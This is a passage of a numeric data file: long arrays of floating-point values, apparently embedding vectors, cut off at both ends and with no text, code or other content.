81,-0.0036684375,-0.0044802683,-0.0057038283,0.009014818,-0.0017307823,-0.002535305,0.005050981,0.01946567,-0.016005052,0.021327348,0.001290459,-0.017259847,0.015723974,-0.009637817,-0.011468974,-0.013049543,-0.028517358,0.016897911,0.03383364,0.002565931,0.00031063223,0.001986256,0.04701845,-0.0034505287,0.0027834505,0.013494912,0.02901124,-0.00032437596,0.0010011162,0.01050627,-0.0034163974,-0.0041375477,-0.013358552,-0.006844159,-0.00669906,-0.017154155,-0.0048797913,-0.0050672926,-0.01425384,0.005295444,-0.015580046,0.002123992,0.004192337,0.03014272,0.017713906,-0.008218907,-0.017625088,-0.0012474245,-0.016170308,0.015061634,-0.0068814782,-0.0024234657,-0.009536905,-0.022529721,0.0018145395,0.005839362,0.009949349,0.020137336,-0.004150242,0.014713443,-0.042321816,0.024738714,0.029421048,-0.0037086864,-0.04342905,0.025153857,-0.014026759,0.000044476146,-0.0109133115,-0.01880213,0.016971005,0.014252765,-0.0045938515,0.0056150164,0.022368858,0.021409214,0.00583149,0.03363889,-0.004104786,0.0072007994,-0.0076823304,0.002946891,-0.011421986,0.0047624055,0.004344019,0.0075230105,-0.0023518133,-0.030004533,-0.012199403,0.010322355,-0.04686123,0.008596274,-0.0018972445,0.0069524213,0.019460985,0.007221656,0.012059103,0.006737919,-0.016820254,0.0072729173,0.017442472,0.013792742,0.02864194,0.026168272,0.0009868146,-0.010352514,-0.0035074032,-0.00166907,0.00756976,-0.004311467,0.0014150399,0.01746307,-0.0022946303,0.004247855,-0.0068002124,-0.015980532,-0.006118674,-0.012286884,0.00027746963,0.09084997,-0.015138033,-0.007237015,-0.004450844,0.0023772786,-0.009693899,0.027817832,-0.013456963,0.0069887917,0.025227616,-0.002665704,0.0005225255,-0.0021921287,0.030749656,-0.0028714358,0.00050216896,-0.00017916954,0.00025097706,0.014030685,-0.0049545616,-0.006928449,0.014123395,-0.008855858,0.00058206066,0.0022133626,-0.020363316,0.0057767145,-0.03906333,-0.009527957,0.00029105585,-0.018098257,-0.012638959,0.022995494,0.01644046,0.027546968,-0.028947677,-0.01620548,-0.012780597,-0.030697836,-0.0023253714,0.01934591,0.023858774,-0.002727284,-0.0064490694,0.008787827,-0.01599842,0.091673456,0.026560511,0.023827404,-0.017838335,-0.018772267,0.015583966,-0.01222679,0.017186765,-0.0009633201,-0.006608092,0.0074000964,0.002671026,-0.00075717026,0.028389828,0.004113589,-0.0106824525,-0.021625951,0.00612586,0.011225961,-0.01208111,0.026502367,0.008495984,0.016168188,-0.018868266,0.010273326,0.023078568,0.017822484,0.00246652,0.003655808,-0.00009089444,0.00028199144,0.0025774306,0.009641369,0.013297177,0.0019496982,-0.06124857,-0.0020450403,0.2038805,0.0042422013,0.015746653,-0.0068054046,-0.017295359,0.0053746495,-0.122701734,0.00012942044,-0.0019601036,-0.013375654,-0.010745112,-0.0059223194,-0.012447277,0.021502592,-0.00015656046,0.011699207,0.007975589,-0.021849845,0.029369978,-0.023043515,0.015990775,0.0028109136,0.012667777,-0.0028095231,-0.025053184,-0.006009598,0.018264873,-0.0007067296,-0.015090992,0.0017457859,0.008554801,0.011808564,0.01623938,-0.0075835157,-0.012504452,0.008919781,0.009540906,0.024115482,-0.010759254,-0.017651234,-0.0071240887,-0.021343112,-0.0009098803,-0.040576138,-0.16140313,0.0069202557,0.0018050397,-0.0365243,0.01927862,0.010058044,-0.0013063092,-0.02044502,0.006192757,-0.001087614,0.023907507,0.016455555,0.013862746,-0.00038603766,0.015834799,0.014805026,0.00092899834,-0.01207322,0.008822169,-0.005445422,0.016011316,0.028014613,-0.02626803,-0.023350786,-0.004642367,-0.007706863,-0.010162568,0.010398149,-0.0029706773,0.02628503,-0.0022406545,0.021445516,-0.019165235,0.00028586516,-0.026999937,-0.020342581,-0.020548461,0.009178547,-0.014231607,-0.0025441453,-0.0012662841,0.019155007,-0.0030513797,0.0056853946,0.0035540962,0.023154566,0.0006442448,0.026983654,0.0048005744,0.008110533,0.021579573,0.0009647294,-0.018236717,0.001710461,0.00729703,0.0044893767,0.008744034,0.0041439403,0.0013950294,-0.004768986,-0.0073738853,0.0028532702,-0.008893639,-0.027772952,0.022751352,-0.045616277,-0.0051477873,-0.02153355,0.0023344504,-0.004462059,0.0013054957,0.0029251876,0.02476041,-0.0115606785,0.004938221,0.018853035,-0.006903913,0.0061545186,-0.0031460647,-0.001070296,-0.006988398,0.0025179996,-0.011086213,-0.014427787,0.0070645097,0.00018910723,0.0007309361,0.01334827,-0.014972702,0.0017280405,0.005600785,0.002359609,0.023566257,0.012172574,-0.0028881454,0.015039383,0.004707057,0.015619777,-0.014122402,0.019275498,0.0022624834,-0.005682299,-0.009005743,0.015260946,-0.03441841,0.012359587,-0.011991784,-0.030948738,-0.01317425,0.003957381,-0.008387017,0.010685655,0.0005211631,-0.02447917,-0.036561,-0.019462397,0.03182103,0.0119501725,0.0042083114,-0.0056786533,-0.018980404,-0.028841175,-0.019585576,0.01461223,0.030518416,-0.006200132,-0.043949936,-0.0039703264,0.016771408,0.00673812,-0.010243778,0.0042313864,0.0011019721,-0.014042181,0.0064512147,0.011577696,0.0025303378,0.00028820493,-0.03354065,-0.004598605,0.014255829,0.0058095087,0.0007418012,-0.00817754,0.036637057,-0.011534006,0.010497774,0.0004572057,0.012754237,-0.009477528,0.008369614,0.048468743,-0.018384669,-0.0046308506,-0.01173745,0.092371896,-0.0059812986,-0.02525648,0.01327116,-0.015135236,0.023318361,0.014919228,0.014300389,-0.025983732,-0.023573747,-0.0076029706,-0.01697948,-0.0038309826,0.025135152,-0.0026240633,0.009348697,0.017096594,0.01803597,-0.012619483,0.0039359718,0.012320566,-0.01193629,-0.00891871,0.02860125,0.02601482,-0.013030469,0.0036593932,0.004806863,-0.027406245,0.011851579,-0.027058277,-0.014160161,-0.0006724918,-0.009426689,0.01740787,-0.042353835,-0.020066934,0.0035811265,0.0075842016,0.011910194,0.011510853,0.0115212435,0.013615889,-0.023116386,0.0110408375,0.007457331,-0.008293746,0.0014081526,0.009698702,-0.02051982,0.009694566,0.033109765,0.0105535975,-0.014021989,-0.0064753606,-0.019867783,0.006105078,0.0016397272,-0.007862414,0.008037959,0.047370892,-0.018230781,0.0014593945,0.0053995885,-0.0028676586,0.011369202,0.017152151,0.0015703347,0.01963312,0.015450625,0.0004744216,-0.004557193,-0.0062689413,0.015921583,0.009303119,0.0098054465,-0.031497844,-0.020627746,-0.01247025,-0.007170579,-0.0050844,0.0038978918,0.010153609,0.004251821,-0.009236299,-0.050190467,-0.0060079326,0.0049558324,-0.0087817535,0.009073174,0.009613709,-0.012291988,0.015666012,0.0097124865,0.029193742,-0.02628435,0.0011934118,0.009934584,0.016049063,-0.0028152817,0.016325522,0.008704183,-0.024404587,-0.033070017,-0.001189202,-0.0318155,0.019964078,-0.022224654,0.007161356,-0.006231523,0.009568657,0.016765643,0.025387071,-0.0033790392,-0.012126399,0.04200145,-0.026427379,0.0054829484,0.0051127104,-0.024603147,-0.0064107794,0.010762527,-0.006110254,-0.0060815355,0.0012094763,0.016456038,0.004600677,0.011246436,-0.0048280396,-0.0019920198,-0.029449286,0.032953344,-0.0083787255,0.0018973966,-0.002749948,-0.011439983,0.036502507,-0.0013854965,0.008484774,0.015928606,-0.0076349275,0.016916439,-0.0025161991,-0.0007538522,-0.000890639,0.0016855256,0.008097988,0.020512344,-0.0019808325,0.006886181,-0.028249344,0.00061234523,-0.012035704,-0.0053180414,-0.013277489,0.009373994,-0.015554808,-0.0018931114,0.0026972673,-0.010838945,0.0016950137,0.016514082,-0.0048637874,-0.009689055,-0.032353994,0.01935327,0.023663614,-0.0034861334,0.006332381,0.002513528,-0.003523493,-0.015152838,0.0069342214,0.012785024,-0.021122938,0.010083352,0.0051046833,-0.008188573,-0.019248871,0.003326871,0.0026840642,0.008098273,-0.045833196,0.0017232891,0.024854805,0.00058627315,-0.021742854,0.025847439,-0.010301896,-0.008888763,0.00073515705,-0.0036639932,0.009838474,-0.001495477,0.0020739632,0.014561519,0.018414808,-0.023842568,-0.002017681,0.0014974104,-0.005538092,0.024672227,-0.0219579,-0.02403044,0.0044641215,-0.0030671167,-0.03602694,-0.014077622,-0.0019850591,-0.0035653224,-0.012472403,-0.002834051,-0.008497769,-0.0054162787,0.0023724257,-0.0015511063,0.0053906064,0.00072419253,-0.0065573826,-0.011406832,-0.012371227,-0.016353803,-0.001966877,0.010640845,-0.039089665,0.012280974,-0.018631855,0.12248335,-0.019827476,-0.0021657753,0.017909814,0.032445084,0.015759181,0.01714233,-0.0031822184,0.007452985,-0.0247004,-0.01112294,-0.02685142,-0.006887539,0.009195799,-0.0062226905,0.003388596,0.00016264599,0.009168982,-0.0015164325,-0.012824618,-0.0059653907,0.020789785,0.015030937,0.0007876691,-0.0042968607,-0.03889253,0.02394367,-0.0034647943,-0.0014021593,-0.022208164,-0.004284744,-0.027381895,0.0025008784,-0.024073495,-0.004743539,0.013112636,-0.003843837,-0.042111445,-0.02298926,-0.009513276,0.013647052,0.01219282,0.00463369,-0.006032748,-0.004907832,-0.005334985,0.021324476,-0.020124951,-0.0065092277,0.0061578387,0.00037641294,0.01581189,0.009005305,0.00007458018,0.015443389,-0.0004270615,0.0049231993,-0.032499757,-0.0038942068,0.0144128315,0.015646795,-0.024465011,-0.001456394,-0.02889695,0.021110721,0.018092232,-0.0000924328,-0.02878457,-0.000091005284,-0.009913401,-0.015687289,0.030209778,-0.011512521,-0.01195158,-0.014882447,0.008889962,0.014163052,-0.005794296,0.002231236,0.011138328,-0.015089471,0.013227227,-0.021901958,-0.005715508,-0.001483105,0.011440308,0.0027995075,-0.013105297,-0.014078527,0.0014487583,0.016938897,0.012837079,-0.004201731,0.0050420538,-0.009696311,-0.006949423,0.0081230495,0.0062268977,0.012447784,-0.018225448,-0.00047502195,-0.010134355,-0.0061300774,-0.026628295,-0.0070458152,0.00080888945,-0.108028635,0.012114873,-0.0075948266,-0.016381742,-0.0059512593,-0.023648608,0.015364436,0.08241844,0.007835183,-0.028521795,0.0035855456,0.026399808,0.025190523,0.00007176274,-0.007939485,0.026636126,0.009523096,-0.0137962885,-0.014673429,-0.0006286533,0.0006181006,-0.0005717828,-0.008456655,-0.020077262,-0.019583523,0.0069596125,-0.01724248,-0.011489714,0.013217942,0.011147264,-0.016298173,-0.013622797,0.00048696823,0.018897248,0.0015670799,0.0074247285,-0.004719927,0.019447839,0.014780364,-0.005637102,0.0051183817,0.008950237,0.014616108,0.01656115,-0.013881237,0.030093394,-0.019268315,0.0064365985,0.001650273,0.0058732815,-0.005271368,-0.0037036198,0.018807754,0.014074441,0.012261627,0.00025737818,-0.010732555,0.00044817204,0.020588323,-0.0064101103,0.008675072,0.003800589,-0.0011425839,-0.012340923,0.003505096,0.006640411,0.0067337044,0.0017228797,-0.0015139306,0.0041423216,0.004563072,0.018174311,-0.010172697,-0.018429248,0.0073864674,0.009929965,0.006074361,0.016959017,0.008509443,0.024559207,-0.010503362,0.0066193542,-0.0016879824,0.007814535,0.01993759,0.020699933,-0.01315063,0.0060606976,-0.0003541877,0.015291111,0.013091876,-0.00068402704,-0.0026260356,-0.008679915,-0.006898175,0.019172557,-0.020036677,0.018704876,0.0044114375,0.0043141977,0.00441751,0.017523723,-0.026675193,-0.009529541,-0.15467927,-0.003984675,0.01906708,0.0076009207,-0.0048062857,-0.006770237,0.0057860995,0.001458314,0.005031871,-0.0138186235,-0.017331442,0.02381732,0.014100094,0.012466174,-0.0011661114,-0.0077529373,-0.029397493,-0.020089865,-0.002898375,-0.016959641,0.008744582,-0.007455563,-0.020394793,-0.008273725,0.027384698,-0.01567216,0.0029508772,0.01877828,0.014815312,-0.003676179,0.004742764,0.012513342,-0.002446675,0.017990727,-0.007501176,-0.008334166,0.0118951555,-0.015163886,-0.009429034,0.020038856,0.015064704,-0.016941775,0.0139391245,0.0036797412,0.020249898,0.003562454,0.020056402,-0.0025631161,0.008992098,0.015642844,-0.008350473,0.0069739404,-0.008325626,0.0043712207,0.011127275,-0.034885883,-0.016582565,0.012396134,-0.009147738,0.01978786,-0.015067791,0.012641106,-0.008310055,0.008892215,0.0043363124,0.021066971,-0.0024408114,0.0013303851,-0.020870259,0.014584903,-0.016028635,0.0058779335,-0.00021318703,0.0060593016,0.02263624,0.00094062486,-0.002706938,0.015194939,0.009289375,-0.023520987,-0.010864582,-0.022216028,-0.015789233,0.020818468,0.0032492992,0.010688916,-0.013473141,0.0048897206,-0.033030014,0.022531006,0.0038380781,0.00084764836,0.001504327,-0.018466469,0.016800318,0.010375613,0.020361539,0.01685287,-0.01472773,-0.019564511,-0.028717838,-0.015798878,-0.0101736635,-0.0026988375,0.00046166967,-0.008719011,-0.01791163,-0.012701055,0.0016438541,0.0055082724,0.019290898,0.017064692,-0.022086848,-0.0100410385,-0.014848316,0.007968231,0.0007422349,-0.014222111,-0.007723388,0.0034009344,-0.019200692,0.016200893,0.0025508741,-0.034306433,-0.022675384,0.0002531138,0.00012769201,0.022597015,0.022130467,-0.018224232,0.014105321,0.014717013,0.024568506,-0.03336444,-0.0010247086,0.02041451,-0.006519916,-0.035320036,0.009196434,0.019135986,-0.015131744,-0.009944703,0.012982202,0.0021799775,0.0021016365,-0.015365709,0.0008255248,0.023735587,0.00397092,0.0005741068,0.007846087,0.001714043,0.014305056,0.015355127,-0.017865483,0.0022159626,-0.007144639,-0.00934702,0.016890548,0.003586474,0.0044695702,-0.00012893898,0.01419638,0.013279459,0.007178357,-0.0065288274,0.00947637,-0.0026583876,-0.00066389435,-0.0012577906,-0.0067293597,-0.0037831923,0.012752328,-0.012327947,0.009219412,0.037111968,0.027523508,0.045299273,-0.00859559,0.019259881,0.019075947,0.0034292964,-0.004764213,-0.003616926,-0.00019902171,0.010099561,0.0061536836,-0.005698253,0.010716758,-0.013283984,0.023473104,-0.0465998,-0.010611689,0.0026006661,-0.021696568,-0.005072699,-0.010014888,0.01297271,0.017675027,-0.022206118,0.016578218,0.0150097925,-0.000932652,-0.0026276985,-0.004196505,0.010090874,0.0043909703,0.029618245,0.000079926314,0.0050854078,-0.008589299,-0.029642023,0.0016053296,0.013738897,-0.0043869102,0.025750032,-0.009614389,-0.018546944,-0.0008300654,0.0029192592,-0.011626565,-0.023027636,0.0052527394,-0.030022733,-0.0077105863,0.023106199,0.01901811,0.019186966,0.010921916,0.008811247,0.00964399,0.019406779,-0.019927328,0.001944864,0.016206997,0.004183547,0.025018813,0.010300441,0.0031268348,0.005482173,0.004590933,0.00947565,0.009400948,0.002459961,0.006876267,0.005227766,0.021501616,0.0043433555,0.01382348,-0.005308562,0.0030064753,-0.019947018,-0.001482021,0.00013200592,-0.015600264,-0.00914825,0.023568962,-0.00018698328,-0.01505711,0.010003857,-0.02917832,-0.029051313,-0.010561154,0.005127755,-0.010847938,-0.026265763,0.02877784,-0.029584266,0.0020459422,0.012100856,-0.0035642923,0.018635655,-0.0018383055,-0.0065910453,0.017609963,-0.01990502,-0.019175913,-0.024418967,-0.0076389643,0.00069627847,-0.007394691,-0.0031412388,-0.0038745683,0.004045323,-0.00027474624,0.0017587914,-0.018680751,0.02100361,0.004343901,-0.010734479,0.006170096,0.011092639,-0.011011711,-0.022446694,-0.027923115,0.0023037682,0.017023955,-0.0055173924,0.004786882,-0.0019281099,-0.007998583,-0.013114389,-0.013149103,0.019777222,-0.022839714,-0.005967281,-0.006739317,0.002444969,-0.0052548205,-0.0029399653,-0.014781328,0.00040811946,-0.024182975,0.012983828,0.011910718,-0.0052085402,-0.02394966,-0.02102351,-0.024530502,-0.012620626,0.004011602,-0.015420182,0.013085687,-0.02177934,0.012234352,0.006589766,0.0067764963,0.0077792658,0.011742948,0.016715644,0.020873917,-0.021253334,-0.015829757,-0.01045178,0.009132565,-0.0105897775,-0.014900441,0.022361234,-0.0070391013,0.004923786,0.0038937638,0.006047029,-0.011818941,-0.015944552,0.0238047,-0.00049129507,-0.01394876,0.0037677884,-0.013715851,0.023766814,-0.003575654,-0.00012398213,-0.0044789617,0.030592036,0.009569544,-0.0015776973,-0.028106503,-0.0031879845,0.008683372,0.0151057495,-0.008907065,0.017170332,-0.023957899,0.017999705,0.017541822,-0.0023465394,-0.014123339,0.0020701382,-0.00036489777,-0.015708644,-0.005794822,0.014422669,-0.020606514,-0.018333254,-0.0068504876,-0.09581166,0.008591184,0.022733074,-0.01399775,0.02204232,0.02673817,-0.017754769,-0.015662843,-0.0037767352,0.0009991804,-0.010637303,0.0035667815,-0.008845038,-0.007817233,-0.0027245923,-0.018406687,-0.014673941,0.011222303,0.020573797,0.008112197,-0.017310841,0.021949751,-0.0085619455,-0.0034949852,0.013803961,-0.014951079,-0.007461512,0.0123428665,0.00029909107,0.0060403394,-0.00531078,0.0081403535,-0.0031515385,-0.012002495,0.013483123,-0.0128143765,0.003062262,-0.0028656644,-0.015425538,-0.011953395,0.014097485,-0.005255407,0.0033191054,-0.016562305,-0.008085572,0.019668782,-0.01826933,-0.007207794,-0.029572755,-0.0012557097,0.0300684,-0.016363716,0.0011851527,0.020337207,-0.0069877915,-0.0030120038,0.028625194,-0.017256543,0.014180921,0.0048987614,0.0038457783,-0.015807595,0.026446503,0.00043252757,0.0067705624,0.017889218,0.0047894293,-0.01729538,-0.023697099,0.0050918604,0.015445762,-0.024383524,-0.026170079,0.02880218,-0.00644272,0.0015322545,-0.0058430475,-0.011276183,0.014581992,0.011275979,0.003979228,0.014630808,0.00636391,-0.010748735,0.022524035,-0.0056370744,-0.023808083,0.0057076532,0.015321947,0.020848718,0.0082180565,0.006545701,0.017276403,0.009877937,0.00135045,0.016707674,0.007591744,-0.0030642808,0.0019418104,0.0034989982,-0.007169154,0.0052314433,0.016071161,0.005117668,0.020172922,-0.014050046,-0.012293982,0.01533841,0.000013675543,-0.015249245,0.0015616996,0.010118186,0.026893198,0.030241027,0.017042307,0.01027517,-0.0032789384,0.010043042,-0.017018313,0.0077680517,-0.024649587,-0.017275821,-0.026846262,-0.0017777776,0.004444811,0.008949692,-0.00924489,-0.018333111,-0.009686307,0.0007816277,-0.0024819325,0.02907002,-0.011893788,0.023277795,0.0066111563,0.0002918345,-0.005613578,0.012048294,-0.0013393147,0.005070922,0.002122488,-0.036944125,0.0215421,0.03402663,-0.012074785,0.02491705,-0.021499973,-0.0072403057,-0.025014153,-0.008823471,-0.0016911116,0.014889665,0.0034605965,0.0026239362,-0.011727609,0.0049373438,0.0111707235,0.014381267,0.018462306,0.0006091142,0.011500216,0.016251024,0.0097244335,-0.00800729,-0.014207903,0.017115846,0.026525566,-0.018390365,-0.0052244626,-0.0272733,-0.0089377025,-0.013276576,0.0003096402,0.0012841737,-0.012580831,0.025898367,0.025229683,-0.000013015432,0.013893937,-0.017711695,0.0030812323,-0.0063641854,-0.0183907,0.0073575177,-0.004549979,-0.015884865,-0.003112126,-0.001989496,-0.00015109332,-0.025987761,-0.0054312837,0.0009968802,0.010500081,-0.0008425377,-0.014286699,-0.006430148,0.0024916166,-0.0018656054,0.0010184526,0.005315139,-0.021725435,0.006475375,0.0031726381,0.012862654,0.0059056813,0.010086955,0.00024461976,-0.0021537116,-0.0033444562,-0.0041347723,-0.0064393193,0.0031001805,0.0044548553,0.08305915,0.03666413,-0.0043822373,0.00038021023,-0.014530073,0.010499763,0.010848453,0.0058074254,0.0014895658,-0.0012963838,0.0013710939,-0.0058595547,0.0021743646,-0.012915603,-0.00295379,0.012934614,0.026127312,-0.0041390024,0.00030407697,0.0074381507,0.008611903,-0.016712816,-0.010559914,-0.01372341,0.020194277,-0.035064727,0.024269713,0.008722645,-0.0078288,0.013848179,0.0064028096,0.009532912,0.017129105,0.010811501,-0.022689108,-0.012096945,0.016621564,-0.0044349525,0.0074840817,0.015390263,0.028173577,0.0022276912,-0.00578583,-0.013306607,-0.031986423,-0.0023406893,0.00596892,-0.0005672232,0.0050044507,0.009391694,0.020505026,0.026699979,0.0017727357,-0.0074816523,0.021560667,0.0040545007,0.0029401525,-0.0037046599,0.027948627,-0.0012048518,0.018481122,-0.0009838133,0.0042084274,0.02127482,0.02450226,0.0017577562,-0.024538765,-0.017247543,-0.024203688,-0.020222902,0.023820154,-0.013251574,0.006288901,0.015330313,-0.008098548,0.006462565,-0.009897739,-0.019641962,-0.0030296722,-0.00068036985,0.008934149,0.00009908049,-0.012423033,-0.010468079,0.032076173,-0.00851335,0.0040716208,0.03588797,-0.0052783075,0.0018506733,0.004693862,-0.0015222023,-0.00066148717,0.008302467,0.004272181,-0.012755931,0.015332319,0.008713078,-0.0031662835,-0.0060715755,-0.010191595,0.020527516,0.004216069,-0.0028131977,-0.020079872,-0.006117477,0.0023248496,0.031819575,-0.015826376,0.0031356611,-0.0070512714,0.0070464117,0.01981112,0.008129604,-0.008738728,-0.019136066,-0.0038767622,-0.014263593,0.008131739,-0.010618198,-0.00996149,-0.0019460348,0.024395239,0.026464988,-0.00029149823,0.023421,-0.002031776,0.0020760072,-0.008411615,-0.006097481,0.0052767606,-0.033116262,-0.027126402,0.017220233,0.0026171068,-0.0027576028,0.021277376,0.0029362224,-0.025760941,0.020531513,0.018645497,-0.0043933536,0.0025442904,-0.0050415546,-0.010326921,-0.01382385,0.018826138,-0.0053443494,0.0045841155,0.015218669,0.0073071984,0.016455935,-0.025515912,0.002760088,-0.008046141,-0.01792996,0.016276566,-0.016333075,-0.0073878933,0.005747409,0.018644145,0.009144634,0.0047343085,-0.057395358,0.002182667,0.012193921,-0.00022212857,-0.017832683,-0.0032949646,0.011918948,-0.01477679,0.010724277,-0.025807895,0.0064402544,-0.0072285207,0.011021964,0.023857985,0.0074209156,-0.0015751568,-0.018283887,0.0077640647,0.028634856,-0.017255694,0.006925299,0.020517554,-0.018875584,0.009056324,0.013245543,0.013156976,0.050824985,-0.0074104266,-0.0020356164,-0.00043597262,-0.01120879,0.0024956285,0.004605035,-0.023846766,0.041617703,-0.013627294,-0.055500463,-0.026391348,-0.01295502,-0.008199026,0.008242665,0.009835846,-0.003847921,0.0006354302,0.00011987352,-0.014193741,0.0038784223,0.0022367872,0.0127922185,0.0071816766,-0.022853749,-0.0055932538,0.013055554,-0.033926297,0.0031524918,-0.025730127,0.0018526649,0.005091244,0.0084964065,-0.010835214,0.0039681247,0.0140092615,-0.021851603,0.0068785436,0.022374691,0.010402893,-0.034543402,-0.0020366786,0.017875895,-0.0011338547,0.007021618,-0.012770466,-0.014842658,-0.013325947,0.019763438,-0.0032421257,-0.0018787067,-0.010803788,0.018321255,0.0017714511,0.0026690697,-0.04135459,-0.0031002257,0.0016796095,-0.006005458,0.011107349,-0.018275531,-0.027013743,0.0012045266,-0.0057832883,-0.019357987,-0.032181337,-0.0044069067,-0.017561072,0.000396518,0.016347513,-0.018826727,0.00079897617,-0.0036823573,0.016616698,0.0038650425,-0.001235196,-0.0018829012,-0.00065635506,-0.006979105,0.014910635,-0.0080201,-0.012240142,0.01930668,-0.01759106,-0.0037642354,-0.008919889,0.0063113947,-0.006918175,-0.020266606,0.000087429136,0.024311762,-0.0043214518,-0.014828074,0.012258852,-0.03464488,-0.00864403,-0.014236345,0.01457419,0.0011006639,0.059180625,-0.051891923,0.012377982,0.027705176,-0.010262061,-0.022137867,0.022079488,-0.025250731,-0.08813455,-0.024675982,0.037756577,0.0036172187,0.003078614,-0.010107763,0.0021683206,0.014802954,-0.0037578535,-0.032139625,-0.018292384,-0.0014140115,-0.0059356038,0.022722436,-0.0027300036,-0.00032713992,0.010552946,-0.014435264,-0.015332473,-0.028585773,0.010987005,0.011330578,0.0012587077,-0.003347951,0.017568462,-0.007276549,-0.00017755212,-0.015782624,-0.009903715,-0.018597823,0.0055441996,-0.014661766,-0.037785903,-0.016686164,0.0107728895,-0.00641953,-0.0013722063,-0.017569024,-0.0094929505,0.023421938,-0.010292833,0.14339507,-0.012602755,-0.008506328,-0.019307265,0.006464392,-0.012816539,-0.025845058,0.00741578,-0.0029736464,0.005523918,0.012883874,-0.025156407,0.006614729,0.020298949,0.014812421,-0.020221274,-0.010935074,0.16745752,-0.004611598,-0.0021988854,0.020183826,-0.002260727,0.0037853236,0.012002966,-0.004977434,-0.058128804,-0.011479718,-0.026866933,0.01664919,-0.003679507,0.0014426903,0.03093159,0.010704198,-0.00012559356,-0.00394598,0.02496613,-0.019777209,0.00027440913,-0.020468533,0.01132906,0.0059440914,-0.0067836856,-0.0021878302,0.016767846,0.006284241,-0.0048291036,-0.0016310263,0.003509123,0.00035917398,0.020517603,0.002425683,0.0064343456,0.017607601,-0.007984949,0.008269,0.003983716,-0.00049377966,0.009110522,-0.020323208,0.010806553,0.0067795953,-0.004481469,-0.022409959,-0.0046090498,-0.01297107,0.0068459255,-0.0050188727,-0.023947302,-0.00912748,-0.0061626965,0.019998658,0.0018598683,-0.006438222,-0.006255219,0.014961738,-0.001600975,-0.010276242,-0.009699128,0.015034616,-0.013881764,0.008571243,0.004597156,-0.01610936,-0.016498508,0.0011278216,0.008951501,0.006213657,0.0027252221,0.0008691234,0.013413961,-0.017165158,0.0148173645,-0.011874656,0.0074036564,0.018368365,0.0067030233,0.009885351,-0.0061329827,-0.024959354,-0.022202846,0.0030269693,0.030233413,-0.020433407,0.018915636,-0.003388598,-0.0037078026,-0.0075509525,0.0032554574,0.0076194215,0.008781801,0.0029094624,0.0089815715,-0.004944207,0.006039903,-0.023199778,-0.011046524,-0.0052076797,0.020563684,-0.0039227083,0.016853698,-0.01133123,-0.019729894,0.018969009,-0.0027390723,-0.026581435,-0.0026071987,0.005599259,0.013469823,-0.01803742,-0.01537777,0.0049855825,-0.014582023,-0.015297338,0.015237331,0.02189841,-0.012162855,0.006682661,0.012741534,-0.004764338,-0.0027714884,-0.00639702,0.030458549,-0.011377339,0.021685982,0.006141973,-0.011342393,0.025700942,0.00268496],[-0.008413532,0.004575139,-0.0036965501,-0.01718373,-0.0012978868,-0.0141544975,-0.0035986926,0.022458691,0.020773813,-0.0075409296,-0.0039706593,0.024897924,0.0061438237,0.016086234,0.0072061573,-0.0023341693,-0.0048885923,-0.007422191,0.011507555,-0.01897349,0.009719027,-0.01150805,0.006163928,-0.009121781,0.02029053,0.011938177,0.0022065183,0.0026392513,-0.0018568792,-0.019507298,0.00036308635,0.018667871,0.0051978463,-0.004325146,0.013474966,0.0010959922,0.0011107496,0.0038254787,0.009126193,0.0016692068,0.003623027,0.009718569,-0.026952516,0.0076567815,-0.015976971,-0.0022842258,-0.007301177,-0.004499241,-0.03161485,0.01297004,0.0059288484,0.005546395,0.001403179,0.017322533,0.008574405,0.027127868,-0.0073944894,-0.02799965,0.023519944,-0.017249864,-0.012763622,0.013587858,0.0009425492,-0.006412337,0.025938487,0.0046633976,-0.0046579977,-0.018359387,-0.0058076577,0.000984692,0.032583524,-0.007423825,-0.0033938587,-0.0018607207,0.013156681,0.00228098,-0.016071264,-0.000083010265,-0.020818455,-0.0069482513,-0.028421687,0.008101217,0.0031257288,-0.0060627325,-0.01585388,0.0062544793,0.000026347116,0.0021496944,-0.0014931381,-0.00654924,-0.0080997115,-0.012600109,-0.0044224164,-0.007318734,0.008447219,0.0071761156,0.012150618,0.0005649885,-0.0220344,0.0026629828,-0.021304892,0.00011176837,-0.034186076,0.007260694,0.0004325083,-0.0155482525,-0.0067149084,0.0042226957,-0.0062452224,-0.0137921255,-0.009555131,-0.0022733712,-0.0018881032,-0.012033447,-0.014247696,0.0018460264,-0.006054214,0.0051008263,-0.018594416,-0.006936052,-0.0064873258,-0.009500659,0.01295838,0.0023477708,-0.013871021,-0.00037151063,0.023824949,0.009511957,-0.0040831226,0.0015110404,0.012157712,0.024906052,-0.010527073,-0.0062107965,0.00733652,-0.011291332,0.0052817394,0.007841378,0.01965238,-0.009911895,0.013752074,0.009362274,0.018576711,0.006764537,0.007148201,0.003709754,0.010402477,-0.006078518,-0.0021779167,-0.009923198,0.013240178,0.02189162,-0.010904891,-0.018730227,-0.019995702,-0.003353654,-0.020088745,-0.015027574,0.00064537965,0.016914213,-0.0021231212,-0.015668057,0.007910652,0.015392515,-0.009999447,0.0044745463,-0.014507908,-0.00039689903,-0.013033943,-0.026333174,-0.0024902525,0.028614927,0.015323438,0.001412878,-0.0051179146,-0.0021136447,0.02318711,-0.020113578,-0.010641957,0.0047091376,0.009260822,0.026508546,0.0064524347,-0.007905095,0.017044716,0.017492525,0.030335233,-0.008295405,0.0028510813,0.00708252,-0.020567805,-0.01690196,-0.007616447,-0.008427633,-0.015361802,-0.024447713,-0.015896633,0.14285453,-0.022369338,-0.01282278,-0.035252217,-0.00053497386,0.011945339,-0.020276576,-0.016946811,0.00233436,-0.005406644,-0.0069901804,0.010100955,-0.0020784396,0.001683412,-0.0106860055,0.014419574,0.007238823,0.009724984,-0.070993595,-0.0032391134,0.010844263,-0.018931167,0.011987905,-0.0010910349,0.008263523,-0.0069587915,-0.007252157,-0.0076755076,0.0011869787,-0.004808353,0.008712123,0.019672718,-0.027264427,0.010430953,0.010341945,-0.0307778,-0.013108142,0.0056063505,-0.021182183,0.01742008,-0.006365758,-0.002047743,-0.009253874,-0.016511854,0.009719681,0.029813305,0.0018010404,0.007056075,-0.011269129,0.013169294,0.018715965,-0.014592017,-0.0006668486,-0.0074336175,-0.01158155,-0.012159241,0.015439061,-0.0032729818,-0.01611113,-0.0069350637,0.0014399847,-0.02032742,0.0077444995,-0.00589698,0.006570345,-0.0014668532,0.008749587,0.020895846,0.011380895,0.012349791,-0.024698941,-0.020001875,-0.01718455,-0.023758156,0.00827124,-0.0059907036,-0.018106624,0.011106063,0.0020034076,0.025023343,-0.016786797,-0.00029211066,0.0015110691,-0.00077399734,0.010162592,-0.023935478,-0.029972946,-0.00528809,-0.0012386834,0.023985097,-0.0061124046,0.016800791,-0.0055488213,-0.0144846095,0.027572764,0.013660972,0.005417905,-0.